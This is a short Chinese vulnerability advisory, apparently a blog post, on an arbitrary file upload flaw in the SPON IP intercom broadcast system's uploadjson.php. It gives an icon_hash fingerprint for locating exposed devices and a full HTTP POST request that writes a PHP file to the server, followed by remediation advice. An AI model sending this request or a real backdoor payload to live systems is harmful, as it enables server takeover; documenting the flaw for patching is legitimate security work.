世邦通信 SPON IP网络对讲广播系统uploadjson.php任意文件上传漏洞

产品介绍

世邦通信SPON IP网络对讲广播系统采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。

漏洞描述

spon IP网络对讲广播系统uploadjson.php存在任意文件上传漏洞,攻击者可以通过构造特殊请求包上传恶意后门文件,从而获取服务器权限

资产测绘

icon_hash="-1830859634"

漏洞复现

ruby 复制代码
POST /php/uploadjson.php HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
Content-Length: 61

jsondata[filename]=7788.php&jsondata[data]=<?php echo 'ok';?>

访问上传文件地址

修复建议

1、升级到安全版本

2、如非必要,禁止公网访问该系统。

3、设置白名单访问。

相关推荐
nece0013 小时前
PHP单独使用phinx使用数据库迁移
开发语言·php·数据库迁移·phinx
晴子呀6 小时前
Spring Boot 项目文件上传安全与优化:OSS、MinIO、Nginx 分片上传实战
安全
火山引擎开发者社区6 小时前
来自火山引擎的 MCP 安全授权新范式
安全·火山引擎·mcp
0x派大星7 小时前
智能合约安全全解析:常见漏洞、真实案例与防范实践
安全·去中心化·区块链·智能合约
Frank Underwood_P7 小时前
零信任网络(1)
网络
一袋米扛几楼9810 小时前
【物联网】MQTT / Broker / Topic 是什么?
网络·物联网
天翼云开发者社区10 小时前
分布式系统-秒杀
大数据·安全·中间件
AI浩11 小时前
Transformer架构三大核心:位置编码(PE)、前馈网络(FFN)和多头注意力(MHA)。
网络·深度学习·transformer
monster_风铃12 小时前
神州数码VRRP 原理与配置篇
网络·智能路由器
运维_攻城狮12 小时前
Nessus 是一款免费功能强大的漏洞扫描工具,广泛用于网络安全评估。
安全·web安全